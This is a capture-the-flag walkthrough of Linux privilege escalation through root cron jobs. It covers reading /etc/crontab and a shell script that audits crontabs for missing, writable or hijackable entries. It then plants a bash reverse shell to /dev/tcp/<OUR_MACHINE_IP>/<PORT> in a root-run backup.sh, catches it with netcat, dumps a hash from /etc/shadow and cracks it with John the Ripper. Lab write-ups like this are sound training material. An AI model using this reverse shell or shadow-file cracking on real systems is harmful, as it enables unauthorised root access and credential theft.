Privilege escalation ideally leads to root privileges. This can
  sometimes be achieved simply by exploiting an existing
  vulnerability, or in some cases by accessing another user account that has more
  privileges, information, or access.
 
Cron jobs are used to run scripts or binaries at specific times. By default, they run with the privilege of their owners and not the current user. While properly configured cron jobs are not inherently vulnerable, they can provide a privilege escalation vector under some conditions.
  
The idea is quite simple; if there is a scheduled task that runs with
  root privileges and we can change the script that will be run, then our script
  will run with root privileges.
Cron job configurations are stored as crontabs (cron tables), which list each task together with the schedule it runs on. Each user on the system has their own crontab file and can run specific tasks whether they are logged in or not. As you can expect, our goal will be to find a cron job set by root and have it run our script, ideally a shell.
Any user can read the file keeping system-wide cron jobs, /etc/crontab. The drop-in files under /etc/cron.d and the scripts in /etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly and /etc/cron.monthly are worth reading for the same reason, and crontab -l shows our own user's jobs.
While CTF machines can have cron jobs running every
  minute or every 5 minutes, you will more often see tasks that run
  daily, weekly or monthly in penetration
  test engagements.
First we SSH into the target: we walk into its house without announcing ourselves (atithi devo bhava) :-p
  # How many cron jobs can you see on the target system?
Ans: 4
We can list the system-wide cron jobs with
  cat /etc/crontab
$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * *  root /antivirus.sh
* * * * *  root antivirus.sh
* * * * *  root /home/karen/backup.sh
* * * * *  root /tmp/test.py
$
One thing to keep in mind: crontab is always worth checking, as it can sometimes lead to easy privilege escalation vectors. The following scenario is not uncommon in companies that have not reached a certain cyber security maturity level:
- System administrators need to run a script at regular intervals.
- They create a cron job to do this.
- After a while, the script becomes useless, and they delete it.
- They do not clean up the relevant cron job.
  
This change management issue leads to a potential exploit leveraging cron jobs.
Look at the two antivirus.sh entries on the target: the script itself is gone from the machine (someone deleted it), but the cron jobs that reference it are still there, and that leftover is our opportunity.
  If the full path of the script is not given (as in the second antivirus.sh entry, unlike backup.sh, which is referenced by its full path), cron resolves the name through the PATH variable set in /etc/crontab. In that case we could create a script named "antivirus.sh" in a directory on that PATH and the cron job would run it. One caveat: the PATH shown above is the stock /usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin, which does not include our home directory, so this route only works if one of those directories is writable by us. The backup.sh job, which points at a script inside our home directory, is the more direct route.
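The checks above can be scripted. The following is an added example, not code from the original write-up: a POSIX shell function that reads a crontab in /etc/crontab format, honours the file's PATH line the way cron does, and reports every job whose script is missing, is writable by us, or is an unqualified name that a writable PATH directory would let us hijack. The function names and the sample crontab (built in a temporary directory, modelled on the one enumerated above) are mine; on a real target you would point it at /etc/crontab and the files under /etc/cron.d.

```shell
#!/bin/sh
# Added example, not from the original write-up: audit a system-wide crontab
# (/etc/crontab, or a drop-in under /etc/cron.d) for the weak spots discussed
# above. Function names are my own. For each job the first token of the
# command is classified as:
#   MISSING     the script path no longer exists (job left behind after a cleanup)
#   WRITABLE    the script exists and we can edit it (the backup.sh case)
#   HIJACK      unqualified name, and a directory cron searches before finding
#               it is writable by us (plant a same-named file there)
#   UNRESOLVED  unqualified name that is in none of the PATH directories
# Limits: only the first token is examined (so "cd / && run-parts ..." is
# skipped) and "PATH = x" with spaces around '=' is not parsed.

audit_crontab() {
    file=$1
    path=/usr/bin:/bin              # cron's default when the file sets no PATH
    set -f                          # lines are full of '*': never glob them
    while IFS= read -r line || [ -n "$line" ]; do
        set -- $line                # split the line on whitespace
        case "${1:-}" in
            ''|'#'*)  continue ;;                      # blank or comment
            PATH=*)   path=${1#PATH=}; continue ;;     # PATH cron uses for this file
            *=*)      continue ;;                      # SHELL=, MAILTO=, ...
            @*)       user=${2:-}; prog=${3:-} ;;      # @daily user command
            *)        user=${6:-}; prog=${7:-} ;;      # m h dom mon dow user command
        esac
        [ -n "$prog" ] || continue
        case "$prog" in
            cd|test|'['|export|if) continue ;;         # shell builtins, not files
            */*)                                       # a path: check it directly
                if [ ! -e "$prog" ]; then
                    printf 'MISSING\t%s\t%s\n' "$user" "$prog"
                elif [ -w "$prog" ]; then
                    printf 'WRITABLE\t%s\t%s\n' "$user" "$prog"
                fi
                continue ;;
        esac
        # Unqualified name: walk PATH in order, as /bin/sh does when cron runs it.
        resolved=
        oldifs=$IFS; IFS=:; set -- $path; IFS=$oldifs
        for dir in "$@"; do
            if [ -x "$dir/$prog" ]; then
                resolved=$dir/$prog; break
            elif [ -d "$dir" ] && [ -w "$dir" ]; then
                printf 'HIJACK\t%s\t%s\tcreate %s\n' "$user" "$prog" "$dir/$prog"
                resolved=hijack; break
            fi
        done
        if [ -z "$resolved" ]; then
            printf 'UNRESOLVED\t%s\t%s\tPATH=%s\n' "$user" "$prog" "$path"
        elif [ "$resolved" != hijack ] && [ -w "$resolved" ]; then
            printf 'WRITABLE\t%s\t%s\n' "$user" "$resolved"
        fi
    done < "$file"
    set +f
}

# Constructed sample modelled on the crontab enumerated above (not the target's
# real file). antivirus.sh is deliberately never created: its jobs are leftovers.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/bin"
    printf '#!/bin/sh\n' > "$tmp/backup.sh";     chmod 755 "$tmp/backup.sh"
    printf '#!/bin/sh\n' > "$tmp/bin/run-parts"; chmod 755 "$tmp/bin/run-parts"
    cat > "$tmp/crontab" <<EOF
# /etc/crontab: system-wide crontab (constructed sample)
SHELL=/bin/sh
PATH=$tmp/bin:$tmp/no-such-dir
17 * * * *  root  cd / && run-parts --report $tmp/cron.hourly
30 2 * * *  root  run-parts --report $tmp/cron.daily
* * * * *   root  $tmp/antivirus.sh
* * * * *   root  antivirus.sh
* * * * *   root  $tmp/backup.sh
EOF
    audit_crontab "$tmp/crontab"
    rm -rf "$tmp"
}

# "sh audit_cron.sh /etc/crontab /etc/cron.d/*" audits real files;
# with no arguments it runs the constructed demo.
if [ $# -gt 0 ]; then
    for f in "$@"; do audit_crontab "$f"; done
else
    demo
fi
```

On the sample the demo reports four findings: run-parts resolves to a file we own, the absolute antivirus.sh path is missing, the bare antivirus.sh name can be hijacked by dropping a file into the writable first PATH directory, and backup.sh is writable. Note that a writable directory early in PATH is reported even when the real binary exists further down, because cron's shell searches in order and would pick up our file first.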
If we try to access the "flag5.txt" file in the "/home/ubuntu" directory, we can see that we don't have access to it.
  Since the enumeration above showed a root cron job running /home/karen/backup.sh every minute, and that script lives in our home directory, we can attempt to exploit it.
We can open the file with nano backup.sh and replace its contents with a bash reverse shell:
  #!/bin/bash
  bash -i >& /dev/tcp/<OUR_MACHINE_IP>/<PORT> 0>&1
  Two details matter here. The crontab sets SHELL=/bin/sh, and on Ubuntu sh is dash, which does not understand the /dev/tcp redirection, so the #!/bin/bash shebang is what makes the payload run under bash. And cron executes the file by its path, so the file has to be executable.
I forgot to check whether the script file was executable, and I kept waiting for a reverse shell that never connected back. I wasted hours googling, modifying my bash shell and trying to figure out why my cron job script wasn't working, and I was about to give up until I noticed the permissions...
I feel dumb for wasting hours on something so simple, but we all learn from our mistakes, and I am no pro anyway.
So, I made the file executable:
chmod +x backup.sh

In the other terminal, I started a netcat listener on the port used in the script and waited for the job to fire; since it runs every minute, the callback should arrive within about 60 seconds:
nc -nvlp 4444
Now, we can see the content of flag5.txt
# What is Matt's password?
Ans: 123456
As we already have root privileges, we can read the shadow file, grab Matt's hash and try to crack it with John the Ripper. Saving the whole shadow line (matt:$6$...) rather than the bare hash lets John print the username instead of "?" in its output.
root@ip-10-10-32-249:/home/ubuntu# cat /etc/shadow | grep matt
cat /etc/shadow | grep matt
matt:$6$WHmIjebL7MA7KN9A$C4UBJB4WVI37r.Ct3Hbhd3YOcua3AUowO2w2RUNauW8IigHAyVlHzhLrIUxVSGa.twjHc71MoBJfjCTxrkiLR.:18798:0:99999:7:::
root@ip-10-10-32-249:/home/ubuntu#
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kernel-exploit/task9]
└─$ nano mattpassword.txt                                                      
                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kernel-exploit/task9]
└─$ sudo john --wordlist=/home/hackerboy/Documents/rockyou.txt mattpassword.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
123456           (?)     
1g 0:00:00:00 DONE (2023-01-07 11:29) 1.492g/s 382.0p/s 382.0c/s 382.0C/s 123456..freedom
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kernel-exploit/task9]
└─$ cat mattpassword.txt
$6$WHmIjebL7MA7KN9A$C4UBJB4WVI37r.Ct3Hbhd3YOcua3AUowO2w2RUNauW8IigHAyVlHzhLrIUxVSGa.twjHc71MoBJfjCTxrkiLR.
                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kernel-exploit/task9]
└─$ sudo john --show mattpassword.txt                                           
?:123456
1 password hash cracked, 0 left
                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kernel-exploit/task9]
└─$ 